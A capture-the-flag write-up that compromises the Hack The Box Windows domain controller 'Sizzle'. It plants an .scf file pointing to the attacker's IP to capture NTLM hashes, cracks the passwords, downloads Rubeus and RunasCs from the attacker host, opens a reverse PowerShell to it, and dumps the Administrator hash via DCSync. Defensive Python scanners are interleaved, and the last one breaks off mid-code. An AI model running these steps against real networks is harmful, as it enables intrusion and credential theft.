HTB - Sizzle

Machine Info
Sizzle is an insane-difficulty Windows box with an Active Directory environment. A writable directory in an SMB share allows an attacker to steal NTLM hashes, which can be cracked to access the Certificate Services portal. A client certificate can be issued by the CA and used for PSRemoting. An SPN associated with a user allows a Kerberoast attack on the box. The user is found to have replication rights, which can be abused to get Administrator hashes via DCSync.
Enumeration
Scope
IP Address: 10.10.10.103
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5986/tcp open wsmans syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p21,53,80,135,139,443,445,3269,5986 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
| tls-alpn:
| h2
|_ http/1.1
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
3269/tcp open ssl/ldap
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2024-07-27T01:09:23
|_Not valid after: 2025-07-27T01:09:23
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2024-07-27T01:09:23
|_Not valid after: 2025-07-27T01:09:23
| tls-alpn:
| h2
|_ http/1.1
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-27T20:48:39
|_ start_date: 2024-07-26T17:19:10
|_clock-skew: mean: 5s, deviation: 0s, median: 5s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
* Open ports: 21,53,80,135,139,443,445,3269,5986
* UDP open ports: 53,88,389
* Services: FTP - DNS - HTTP - HTTPS - RPC - SMB - WinRM - LDAP - Kerberos
* Important notes: Anonymous FTP login allowed - commonName=sizzle.htb.local
Update hosts file with domain name, FQDN and computer name
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ sudo sh -c "echo '$ip htb.local sizzle.htb.local sizzle' >> /etc/hosts"
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ tail -n1 /etc/hosts
10.10.10.103 htb.local sizzle.htb.local sizzle
DNS Enumeration
Zone transfer failed
dig axfr htb.local @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr htb.local @10.10.10.103
;; global options: +cmd
; Transfer failed.
RPC Enumeration
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sizzle]
└─$ rpcclient -U '%' $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
KERBEROS Enumeration
I can't get any users by brute-forcing Kerberos usernames.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sizzle]
└─$ kerbrute userenum --dc $ip -d HTB.LOCAL -t 100 /usr/share/wordlists/seclists/Usernames/jsmith.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/27 17:01:09 > Done! Tested 48705 usernames (0 valid) in 211.838 seconds
LDAP Enumeration
Nothing from LDAP either: anonymous searches are refused until a successful bind is completed.
ldapsearch -H ldap://$ip -x -b "DC=htb,DC=local" '(objectClass=*)'
<snip>
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
HTTP & HTTPS Enumeration
subdomain enumeration
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.htb.local" -fs 60
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Progress: [19966/19966] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:59] :: Errors: 0 ::
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u https://$ip/ -H "Host: FUZZ.htb.local" -fs 60 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Progress: [19966/19966] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:59] :: Errors: 0 ::
Both links, http://htb.local/ and https://htb.local/, lead to the same page.

From the Wappalyzer extension, the web app runs on ASP.NET on an IIS web server.

Since we are dealing with an IIS web server, I will try fuzzing for directories with the IIS.fuzz wordlist.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sizzle]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/IIS.fuzz.txt:FUZZ -u http://$ip/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
certenroll/ [Status: 403, Size: 1233, Words: 73, Lines: 30, Duration: 226ms]
certsrv/ [Status: 401, Size: 1293, Words: 81, Lines: 30, Duration: 227ms]
certsrv/mscep_admin [Status: 401, Size: 1293, Words: 81, Lines: 30, Duration: 194ms]
certsrv/mscep/mscep.dll [Status: 401, Size: 1293, Words: 81, Lines: 30, Duration: 219ms]
aspnet_client/ [Status: 403, Size: 1233, Words: 73, Lines: 30, Duration: 228ms]
images/ [Status: 403, Size: 1233, Words: 73, Lines: 30, Duration: 195ms]
/certsrv requires HTTP authentication, and /certenroll gives Access is denied.
I can say that the machine has a Certificate Authority (AD CS) installed.

SMB Enumeration
Anonymous (null session) login is accepted and the guest account is enabled.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ smbclient -N -L //$ip
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
CertEnroll Disk Active Directory Certificate Services share
Department Shares Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Operations Disk
SYSVOL Disk Logon server share
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec smb $ip -u '' -p '' --shares
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares
SMB 10.10.10.103 445 SIZZLE [+] HTB.LOCAL\:
SMB 10.10.10.103 445 SIZZLE [-] Error enumerating shares: STATUS_ACCESS_DENIED
SMB 10.10.10.103 445 SIZZLE [+] HTB.LOCAL\guest:
SMB 10.10.10.103 445 SIZZLE [+] Enumerated shares
SMB 10.10.10.103 445 SIZZLE Share Permissions Remark
SMB 10.10.10.103 445 SIZZLE ----- ----------- ------
SMB 10.10.10.103 445 SIZZLE ADMIN$ Remote Admin
SMB 10.10.10.103 445 SIZZLE C$ Default share
SMB 10.10.10.103 445 SIZZLE CertEnroll Active Directory Certificate Services share
SMB 10.10.10.103 445 SIZZLE Department Shares READ
SMB 10.10.10.103 445 SIZZLE IPC$ READ Remote IPC
SMB 10.10.10.103 445 SIZZLE NETLOGON Logon server share
SMB 10.10.10.103 445 SIZZLE Operations
SMB 10.10.10.103 445 SIZZLE SYSVOL Logon server share
I will mount Department Shares locally for easy exploring.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ sudo mount -t cifs "\\\\$ip\\Department Shares" ./share
┌──(kali㉿kali)-[~/…/machines/Sizzle/share]
└─$ ls
Accounting Banking Devops HR Infosec Legal Marketing Sales Tax ZZ_ARCHIVE
Audit CEO_protected Finance IT Infrastructure 'M&A' 'R&D' Security Users
Shell as amanda
ZZ_ARCHIVE has several files, and Users has users' folders.
┌──(kali㉿kali)-[~/…/machines/Sizzle/share]
└─$ ls ZZ_ARCHIVE
AddComplete.pptx LimitInstall.doc 'anony-(externalcell).xlsx' test.doc
AddMerge.ram LimitStep.ppt 'anony-(frameset).docx' test.gif
<snip>
┌──(kali㉿kali)-[~/…/machines/Sizzle/share]
└─$ ls Users
Public amanda amanda_adm bill bob chris henry joe jose lkys37en morgan mrb3n
I will try to write a file on each directory and see if I have write access to one of them.
┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─$ for dir in $(find . -type d 2> /dev/null);do touch $dir/file.txt;done
touch: cannot touch './file.txt': Permission denied
touch: cannot touch './Accounting/file.txt': Permission denied
touch: cannot touch './Audit/file.txt': Permission denied
touch: cannot touch './Banking/file.txt': Permission denied
<snip>
touch: cannot touch './Users/joe/file.txt': Permission denied
touch: cannot touch './Users/jose/file.txt': Permission denied
touch: cannot touch './Users/lkys37en/file.txt': Permission denied
touch: cannot touch './Users/morgan/file.txt': Permission denied
touch: cannot touch './Users/mrb3n/file.txt': Permission denied
I will then search for file.txt and see if it was created successfully in any directory.
┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─$ find . -type f -name file.txt 2> /dev/null
./Users/Public/file.txt
./ZZ_ARCHIVE/file.txt
So, I have write access to the ZZ_ARCHIVE and Public folders. I will try to put a .scf or .lnk file there to steal an NTLMv2 hash if any user enters the shared folder (Explorer resolves the IconFile UNC path and authenticates to that host).
The structure of the file looks like this.
┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─# nano ../@rce.scf
[Shell]
Command=2
IconFile=\\10.10.16.7\share\legit.ico
[Taskbar]
Command=ToggleDesktop
Putting the file to the share.
┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─$ cp ../@rce.scf ZZ_ARCHIVE
┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─$ cp ../@rce.scf Users/Public
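As an added defender-side example (not part of this write-up), the following Python script scans a mounted share for exactly the kind of file planted above: it parses .scf/.url files with configparser, flags icon or URL targets that are UNC paths to hosts outside an allow-list, lists .lnk files for review and reports folders the scanning account can write to. The ALLOWED_HOSTS set and the sample files are assumptions I constructed.

```python
"""Scan a mounted share for planted shortcut files and writable folders.

Added defender-side example, not part of the write-up: walks a directory tree
(for example the mounted "Department Shares"), parses INI-style .scf/.url files,
flags any whose icon/URL target is a UNC path to a host that is not on an
allow-list, lists .lnk files for manual review, and reports folders the
scanning account can write to. ALLOWED_HOSTS is an assumption.
"""
import configparser
import os
import re
import tempfile
from pathlib import Path

# UNC path: \\host\share\... (forward slashes tolerated)
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)[\\/]")

# Keys Explorer dereferences on its own when it renders the folder listing.
SUSPECT_KEYS = {"iconfile", "iconpath", "url", "workingdirectory"}

# Hosts allowed to serve icons/URLs to clients (assumption: the DC itself).
ALLOWED_HOSTS = {"sizzle.htb.local", "sizzle"}

# Constructed samples: the .scf layout from the write-up, and a benign .url that
# only references the domain controller.
SAMPLE_SCF = (
    "[Shell]\nCommand=2\nIconFile=\\\\10.10.16.7\\share\\legit.ico\n"
    "[Taskbar]\nCommand=ToggleDesktop\n"
)
BENIGN_URL = (
    "[InternetShortcut]\nURL=https://intranet.htb.local/\n"
    "IconFile=\\\\sizzle.htb.local\\CertEnroll\\intranet.ico\n"
)


def remote_targets(text):
    """Return (section.key, host) for every UNC value under a suspect key."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return []  # not INI-shaped; nothing Explorer would dereference
    hits = []
    for section in cp.sections():
        for key, value in cp.items(section):  # keys are lower-cased by configparser
            if key in SUSPECT_KEYS:
                m = UNC_RE.match(value.strip())
                if m:
                    hits.append((f"{section}.{key}", m.group(1).lower()))
    return hits


def scan_share(root):
    """Walk root; return (path, reason) findings worth a defender's attention."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if os.access(dirpath, os.W_OK):
            findings.append((dirpath, "writable by the scanning account"))
        for name in files:
            p = Path(dirpath) / name
            ext = p.suffix.lower()
            if ext == ".lnk":
                findings.append((str(p), "binary shortcut on share; review its target"))
            elif ext in (".scf", ".url"):
                try:
                    text = p.read_text(errors="replace")
                except OSError:
                    continue
                for key, host in remote_targets(text):
                    if host not in ALLOWED_HOSTS:
                        findings.append((str(p), f"{key} points to \\\\{host}"))
    return findings


def demo():
    """Build a throwaway tree with the constructed samples and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        archive = Path(tmp) / "ZZ_ARCHIVE"
        archive.mkdir()
        (archive / "@rce.scf").write_text(SAMPLE_SCF)
        (Path(tmp) / "link.url").write_text(BENIGN_URL)
        return [(os.path.relpath(p, tmp), r) for p, r in scan_share(tmp)]


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

To use it on a real share, call scan_share() on the mount point instead of the demo tree; the writable-folder check reflects the rights of the account doing the scan, so run it as a low-privilege domain user to see what an ordinary employee can plant. The fix on the server side is an ACL review: archive and Public folders should not be writable by Everyone or Authenticated Users, and SMB signing plus outbound SMB egress filtering stop the leaked authentication from reaching an external host.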
I will start Responder to listen for incoming connections.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
<snip>
[+] Listening for events...
Get a hash

Starting hashcat to crack the hash.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt
<snip>
Cracked successfully :)

Verify with cme
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec smb $ip -u amanda -p 'Ashare1972'
SMB 10.10.10.103 445 SIZZLE [+] HTB.LOCAL\amanda:Ashare1972
Although the credentials are valid, I can't access the machine with winRM
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec winrm $ip -u amanda -p 'Ashare1972'
HTTP 10.10.10.103 5986 SIZZLE [*] https://10.10.10.103:5986/wsman
WINRM 10.10.10.103 5986 SIZZLE [-] HTB.LOCAL\amanda:Ashare1972 "The server did not response with one of the following authentication methods Negotiate, Kerberos, NTLM - actual: ''"
I will continue to enumerate the machine with these credentials, including:
* Share access
* BloodHound collector
* /certsrv authentication
This time I have read access on the CertEnroll share.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ nxc smb $ip -u amanda -p 'Ashare1972' --shares
SMB 10.10.10.103 445 SIZZLE [+] HTB.LOCAL\amanda:Ashare1972
SMB 10.10.10.103 445 SIZZLE [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB 10.10.10.103 445 SIZZLE [*] Enumerated shares
SMB 10.10.10.103 445 SIZZLE Share Permissions Remark
SMB 10.10.10.103 445 SIZZLE ----- ----------- ------
SMB 10.10.10.103 445 SIZZLE ADMIN$ Remote Admin
SMB 10.10.10.103 445 SIZZLE C$ Default share
SMB 10.10.10.103 445 SIZZLE CertEnroll READ Active Directory Certificate Services share
SMB 10.10.10.103 445 SIZZLE Department Shares READ
SMB 10.10.10.103 445 SIZZLE IPC$ READ Remote IPC
SMB 10.10.10.103 445 SIZZLE NETLOGON READ Logon server share
SMB 10.10.10.103 445 SIZZLE Operations
SMB 10.10.10.103 445 SIZZLE SYSVOL READ Logon server share
When viewing the share content, I find interesting files
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ smbclient -U amanda "\\\\$ip\CertEnroll"
smb: \> ls
. D 0 Sat Jul 27 13:19:47 2024
.. D 0 Sat Jul 27 13:19:47 2024
HTB-SIZZLE-CA+.crl A 721 Sat Jul 27 13:19:47 2024
HTB-SIZZLE-CA.crl A 909 Fri Jul 26 13:19:32 2024
nsrev_HTB-SIZZLE-CA.asp A 322 Mon Jul 2 16:36:05 2018
sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt A 871 Mon Jul 2 16:36:03 2018
Download them all
smb: \> mget *
Get file HTB-SIZZLE-CA+.crl? y
Get file HTB-SIZZLE-CA.crl? y
Get file nsrev_HTB-SIZZLE-CA.asp? y
Get file sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt? y
I will mark share access enumeration as done in my notes, switch to collecting data with bloodhound-python for further enumeration, and then go to the /certsrv page.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ bloodhound-python -u 'amanda' -p 'Ashare1972' -ns 10.10.10.103 -d htb.local -c all --zip
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (sizzle.HTB.LOCAL:88)] [Errno 110] Connection timed out
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 8 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: sizzle.HTB.LOCAL
INFO: Done in 00M 20S
INFO: Compressing output into 20240727180002_bloodhound.zip
I uploaded the zip file to BloodHound and went to /certsrv. After authenticating to the web app, it leads me to this page.

I will click on Request a Certificate

Click on advanced certificate request

It asks for a certificate signing request (.csr), which must be signed with a private key. I don't have one, so I will generate a private key and sign a .csr file with it.
To log in to the machine, I need a certificate issued by the domain's Certificate Authority (CA) along with the private key that signed the certificate signing request.
Generate the key and CSR files.
openssl genrsa -aes256 -out amanda.key 2048 # create an encrypted private key (this sets the PEM pass phrase asked for later)
openssl req -new -key amanda.key -out amanda.csr # create the CSR
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ cat amanda.csr
-----BEGIN CERTIFICATE REQUEST-----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-----END CERTIFICATE REQUEST-----
Paste the csr

Click on Download Certificate!

I will use evil-winrm with the following options and enter the passphrase when prompted:
* -S: enable SSL
* -c: certificate file
* -k: private key
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ evil-winrm -i 10.10.10.103 -u amanda -p 'Ashare1972' -S -c certnew.cer -k amanda.key
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\amanda\Documents>
From the Impacket toolkit, I use GetUserSPNs to find accounts with Service Principal Names that can be Kerberoasted.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ impacket-GetUserSPNs htb.local/amanda:'Ashare1972' -dc-ip 10.10.10.103 -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ----- ----------------------------------------------------- -------------------------- -------------------------- ----------
http/sizzle mrlky CN=Remote Management Users,CN=Builtin,DC=HTB,DC=LOCAL 2018-07-10 14:08:09.536421 2018-07-12 10:23:50.871575
When I tried to perform the Kerberoasting attack from Linux, it failed, so I will attempt it from Windows.
When I tried to upload any tool to the box and execute it, it also failed, so something is preventing me.
We are in Constrained Language Mode (CLM):
*Evil-WinRM* PS C:\Windows\Temp> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
Also, after I queried the AppLocker policy, I found that I can run programs in the tmp folder:
*Evil-WinRM* PS C:\Users\amanda> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollection
<snip>
PathConditions : {%OSDRIVE%\tmp\*}
PathExceptions : {}
PublisherExceptions : {}
HashExceptions : {}
Id : d754b869-d2cc-46af-9c94-6b6e8c10d095
Name : All files located in the Program Files folder
Description : Allows members of the Everyone group to run applications that are located in the Program Files folder.
UserOrGroupSid : S-1-1-0
Action : Allow
<snip>
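As an added example (not from the write-up), here is how a defender can review an exported AppLocker policy for rules like the one above, where a rule named after Program Files actually allows everything under %OSDRIVE%\tmp. It parses the XML that Get-AppLockerPolicy -Effective -Xml produces; the sample policy is constructed, the default-rule Id is a placeholder, and only the rule Id from the box is real.

```python
"""Audit an AppLocker policy export for Allow path rules outside protected roots.

Added defender-side example, not from the write-up: parses the XML produced by
`Get-AppLockerPolicy -Effective -Xml` and reports Allow FilePathRules whose path
is not under %PROGRAMFILES%, %WINDIR% or %SYSTEM32%, or whose name claims one
location while the path points somewhere else (the %OSDRIVE%\\tmp\\* rule seen
on the box). The sample policy is constructed; the default-rule Id is a placeholder.
"""
import xml.etree.ElementTree as ET

# Roots that standard users cannot write to by default.
PROTECTED_ROOTS = ("%PROGRAMFILES%\\", "%WINDIR%\\", "%SYSTEM32%\\")

SAMPLE_POLICY = r"""<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="00000000-0000-0000-0000-000000000001"
                  Name="(Default Rule) All files located in the Program Files folder"
                  Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="d754b869-d2cc-46af-9c94-6b6e8c10d095"
                  Name="All files located in the Program Files folder"
                  Description="Allows members of the Everyone group to run applications that are located in the Program Files folder."
                  UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%OSDRIVE%\tmp\*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>"""


def audit_policy(xml_text):
    """Return (collection, rule id, rule name, path, reasons) for risky Allow rules."""
    root = ET.fromstring(xml_text)
    findings = []
    for coll in root.iter("RuleCollection"):
        for rule in coll.findall("FilePathRule"):
            if rule.get("Action") != "Allow":
                continue
            name = rule.get("Name", "")
            for cond in rule.iter("FilePathCondition"):
                path = cond.get("Path", "")
                up = path.upper()
                reasons = []
                if up == "*":
                    reasons.append("allows every path")
                elif not up.startswith(PROTECTED_ROOTS):
                    reasons.append("path is outside the protected roots")
                # The box's rule: name says Program Files, path says \tmp.
                if "program files" in name.lower() and not up.startswith("%PROGRAMFILES%\\"):
                    reasons.append("rule name does not match its path")
                if reasons:
                    findings.append((coll.get("Type"), rule.get("Id"), name, path, reasons))
    return findings


if __name__ == "__main__":
    for coll, rid, name, path, reasons in audit_policy(SAMPLE_POLICY):
        print(f"[{coll}] {rid} '{name}' -> {path}: {'; '.join(reasons)}")
```

Export the live policy on a host with Get-AppLockerPolicy -Effective -Xml, feed the file to audit_policy(), and treat every finding as a rule to delete or to convert into a publisher or hash rule. Path rules under a user-writable folder give AppLocker no protection at all, and a rule whose name disagrees with its path is the kind of thing that survives review because the name looks like the default.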
Shell as mrlky
*Evil-WinRM* PS C:\Users\amanda> cd C:\Windows\Temp
*Evil-WinRM* PS C:\Windows\Temp> curl 10.10.16.7/Rubeus.exe -o .\R.exe
Performing Kerberoasting against the mrlky user with Rubeus.exe.

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ hashcat -m 13100 mrkly.hash /usr/share/wordlists/rockyou.txt
<snip>
Cracked :)

I will then upload RunasCs.exe to the machine to get a shell as mrlky.
*Evil-WinRM* PS C:\Windows\Temp> curl 10.10.16.7/RunasCs.exe -o .\RunasCs.exe
*Evil-WinRM* PS C:\Windows\Temp> .\RunasCs.exe mrlky 'Footxxxxxx' PowerShell -r 10.10.16.7:443
Enter PEM pass phrase:
[*] Warning: The logon for user 'mrlky' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-2e2163$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2888 created in background.
Receive the connection with nc.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.103] 55772
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
htb\mrlky
Get user flag
PS C:\Users\mrlky> type Desktop\user.txt
b31ca0c7a5bcc77a55xxxxxxxxxxxxxx
User Flag: b31ca0c7a5bcc77a55xxxxxxxxxxxxxx
Shell as Administrator
From BloodHound, the user mrlky has DCSync rights, so I can take over the domain by dumping the NTDS database.

┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ nxc smb $ip -u mrlky -p 'Footbxxxxx' --ntds --user administrator
SMB 10.10.10.103 445 SIZZLE [+] HTB.LOCAL\mrlky:Football#7
SMB 10.10.10.103 445 SIZZLE Node MRLKY@HTB.LOCAL successfully set as owned in BloodHound
SMB 10.10.10.103 445 SIZZLE [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.10.103 445 SIZZLE [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.103 445 SIZZLE Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792xxxxxxxxxxx:::
Or with secretsdump.py:
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ impacket-secretsdump htb.local/mrlky@$ip -just-dc-user administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792xxxxxxxxxxx:::
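As an added defender-side example (not from the write-up), the following Python covers the two attack steps of this box that leave the clearest traces in the domain controller's Security log: the Kerberoast against mrlky (event 4769 with an RC4 service ticket for a user account) and the DCSync dump above (event 4662 carrying a directory-replication control-access GUID from an account that is not a domain controller). The events are constructed dicts shaped like the log's EventData fields; DC_ACCOUNTS is an assumption.

```python
"""Flag Kerberoasting and DCSync activity in Windows Security events.

Added defender-side example, not from the write-up: event 4769 (TGS request)
with RC4 encryption for a non-machine service account is the usual trace of a
Kerberoast, and event 4662 carrying a directory-replication control-access GUID
from an account that is not a domain controller is the trace of a DCSync.
The events below are constructed; DC_ACCOUNTS is an assumption.
"""

# Control-access right GUIDs that replication (and therefore DCSync) needs.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Computer accounts of the domain controllers (assumption: one DC, SIZZLE).
DC_ACCOUNTS = {"SIZZLE$"}
# RC4-HMAC ticket encryption types; AES tickets are 0x11/0x12.
RC4_ETYPES = {"0x17", "0x18"}

# Constructed sample events (field names follow the Security log's EventData).
SAMPLE_EVENTS = [
    # normal AES service ticket for the DC's own account
    {"EventID": 4769, "TargetUserName": "amanda@HTB.LOCAL", "ServiceName": "SIZZLE$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.103"},
    # RC4 ticket for the user account that holds the http/sizzle SPN
    {"EventID": 4769, "TargetUserName": "amanda@HTB.LOCAL", "ServiceName": "mrlky",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.103"},
    # DC exercising replication rights: expected noise
    {"EventID": 4662, "SubjectUserName": "SIZZLE$", "ObjectName": "DC=HTB,DC=LOCAL",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # user account exercising replication rights on the domain head
    {"EventID": 4662, "SubjectUserName": "mrlky", "ObjectName": "DC=HTB,DC=LOCAL",
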